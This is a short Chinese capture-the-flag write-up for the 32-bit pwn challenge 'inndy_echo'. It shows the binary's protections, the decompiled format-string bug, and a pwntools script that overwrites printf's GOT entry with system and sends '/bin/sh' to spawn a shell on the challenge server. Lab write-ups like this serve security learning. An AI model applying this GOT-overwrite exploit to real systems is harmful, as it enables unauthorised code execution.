当前位置: 首页 > news >正文

inndy_echo

news 来源:原创 2025/5/4 14:46:25

inndy_echo

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

32位,只开了NX

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+Ch] [ebp-10Ch]
  unsigned int v4; // [esp+10Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  do
  {
    fgets(&s, 0x100, stdin);
    printf(&s);
  }
  while ( strcmp(&s, "exit\n") );
  system("echo Goodbye");
  exit(0);
}

程序很简单,给了格式化字符串漏洞,并且给了system

思路

printf@got-->system 输入/bin/sh

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",25120,"./pwn",10)
context(os='linux', arch='i386',log_level='debug')
#debug('b *0x80485b9')

pl=fmtstr_payload(7,{elf.got['printf']:elf.sym['system']})
sl(pl)
sl(b'/bin/sh\x00')
ia(c)

在这里插入图片描述

相关文章:

  • Mysql各种锁
  • C语言文件操作与管理
  • 信息安全第四周
  • 开源校园服务小程序源码 校园综合服务小程序源码 包含快递代取 打印服务 校园跑腿【带详细部署教程】
  • Mybatis 二级缓存(使用Redis作为二级缓存)
  • Springboot: Spring Cloud Gateway 使用的基本概念及配置介绍
  • Docker 网桥、docker0 网桥和 --net host:平台差异、使用方式和场景介绍简介:
  • 恼人的TCP套接字部分发送成功场景
  • SpringCloud篇
  • 嵌入式Linux应用开发-第十四章查询方式的按键驱动程序
  • 学会使用Git 和 GitHub
  • 文本嵌入层
  • Qt raise()问题
  • 【QT】使用toBase64方法将.txt文件的明文变为非明文(类似加密)
  • Mysql生产随笔
  • vue下载在前端存放的pdf文件
  • 玩碎Java之CompletableFuture的例子
  • Java初始化大量数据到Neo4j中(二)
  • lambda的使用案例(1)
  • 探索视听新纪元: ChatGPT的最新语音和图像功能全解析
  • 自我田野|从城市搬到农村生活,我找回了真实和附近
  • 老人误操作免密支付买几百只鸡崽,经济日报:支付要便捷也要安全
  • 上海环球马术冠军赛开赛,一场体育与假日消费联动的狂欢
  • 证监会:坚决拥护党中央对王建军进行纪律审查和监察调查的决定
  • 南京106亿元成交19宗涉宅地块:建邺区地块楼面单价重回4.5万元
  • 《求是》杂志发表习近平总书记重要文章《激励新时代青年在中国式现代化建设中挺膺担当》